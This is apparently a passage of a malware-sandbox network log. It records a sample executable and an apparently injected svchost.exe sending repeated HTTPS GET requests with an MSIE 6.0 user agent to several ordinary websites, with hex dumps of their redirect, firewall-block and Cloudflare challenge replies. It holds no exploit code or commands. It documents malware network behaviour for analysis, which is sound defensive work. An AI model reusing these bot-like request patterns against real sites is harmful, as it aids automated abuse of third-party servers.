                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1706INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1722INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        113192.168.2.66057849.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1673OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        114192.168.2.661210138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1674OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1690INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1690INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        115192.168.2.661206185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1690OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1723INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1723INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        116192.168.2.661262188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1723OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1724INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DiFRh4FtQut45CIHKVF3pNySqKjLa2yD4TFJ5Hyr0uf0QON2K0ep0gC2k6Th9g9Czv68kEgYfXy9FXjms01XWw5h33LX8xCDrNv09YF%2FtRc9t99nXQHpnew%2BENq%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8612c588fc5-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1725INData Raw: 31 65 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ea7<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1726INData Raw: 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: th,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1727INData Raw: 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 62 48 6c 7a 58 37 38 65 36 46 55 6d 52 39 51 53 5f 4d 58 41 52 39 6c 31 46 6a 6f 59 71 5f 43 75 6c 43 4c 63 59 77 55 61 31 68 6f 2d 31 36 37 38 34 33 31 33 38 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 4a 34 2e 79 7a 5a 5f 56 39 57 35 55 77 78 6d 31 44 39 2e 44 66 37 56 46 5a 45 73 6d 78 45 4b 56 77 4d 74 76 56 4b 78 58 63 52 51 2d 31 36 37 38 34 33 31 33 38 35 2d 30 2d
                                                                                                                                                                                                                                                                        Data Ascii: n="/?__cf_chl_f_tk=bHlzX78e6FUmR9QS_MXAR9l1FjoYq_CulCLcYwUa1ho-1678431385-0-gaNycGzNCPs" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="J4.yzZ_V9W5Uwxm1D9.Df7VFZEsmxEKVwMtvVKxXcRQ-1678431385-0-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1728INData Raw: 51 4d 71 53 66 6b 7a 79 44 59 76 52 31 36 5a 4c 33 39 38 72 71 36 33 34 79 54 5f 4f 76 47 55 70 37 77 56 52 4f 72 77 73 71 79 77 77 34 6f 78 53 6e 4a 68 48 41 30 59 4a 54 30 33 6a 70 65 48 6e 52 55 45 56 63 57 61 76 50 4a 36 42 47 5a 34 74 36 30 6e 67 39 50 31 6c 6d 49 4f 77 5f 49 6b 7a 45 4b 30 4a 58 72 4c 51 4d 43 79 35 35 52 51 48 6a 70 43 71 7a 49 59 49 6f 73 77 69 75 4b 69 6c 64 78 4a 43 69 77 6d 43 66 36 56 38 6a 54 34 31 73 33 4a 72 59 6f 61 48 66 72 31 44 52 6e 56 61 44 35 41 42 52 2d 74 37 36 79 71 7a 4d 65 4c 6b 45 4c 2d 51 65 34 57 31 4f 69 42 45 33 69 35 4f 69 61 5f 66 48 73 72 4c 54 31 47 68 54 51 49 4f 30 64 66 68 37 52 69 4f 77 47 44 61 2d 42 51 51 53 7a 57 69 6f 36 2d 33 37 37 43 49 45 6b 4f 30 4a 6f 35 38 37 79 61 6d 42 45 66 45 39 73 76
                                                                                                                                                                                                                                                                        Data Ascii: QMqSfkzyDYvR16ZL398rq634yT_OvGUp7wVROrwsqyww4oxSnJhHA0YJT03jpeHnRUEVcWavPJ6BGZ4t60ng9P1lmIOw_IkzEK0JXrLQMCy55RQHjpCqzIYIoswiuKildxJCiwmCf6V8jT41s3JrYoaHfr1DRnVaD5ABR-t76yqzMeLkEL-Qe4W1OiBE3i5Oia_fHsrLT1GhTQIO0dfh7RiOwGDa-BQQSzWio6-377CIEkO0Jo587yamBEfE9sv
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1730INData Raw: 63 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 38 62 37 66 65 33 33 33 62 34 34 63 39 31 33 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 62 48 6c 7a 58 37 38 65 36 46 55 6d 52 39 51 53 5f 4d 58 41 52 39 6c 31 46 6a 6f 59 71 5f 43 75 6c 43 4c 63 59 77 55 61 31 68 6f 2d 31 36 37 38 34 33 31 33 38 35 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 70 6c 56 3a 20 34 2c 0a 20
                                                                                                                                                                                                                                                                        Data Ascii: c5', cHash: '8b7fe333b44c913', cUPMDTk: "\/?__cf_chl_tk=bHlzX78e6FUmR9QS_MXAR9l1FjoYq_CulCLcYwUa1ho-1678431385-0-gaNycGzNCPs", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0', cTplV: 4,
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1731INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 32 34 6e 74 73 4e 44 71 63 75 55 54 55 4a 67 44 36 6a 31 77 51 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b 44 59 49 30 4d 48 64 72 6c 6b 3d 27 2c 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: i2: '24ntsNDqcuUTUJgD6j1wQg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7skDYI0MHdrlk=',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1732INData Raw: 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinfo"> <div cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1733INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        117192.168.2.661267138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1724OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1724INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1724INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        118192.168.2.661281185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1733OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1733INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1734INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        119192.168.2.661297138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1734OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:25 UTC1735INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
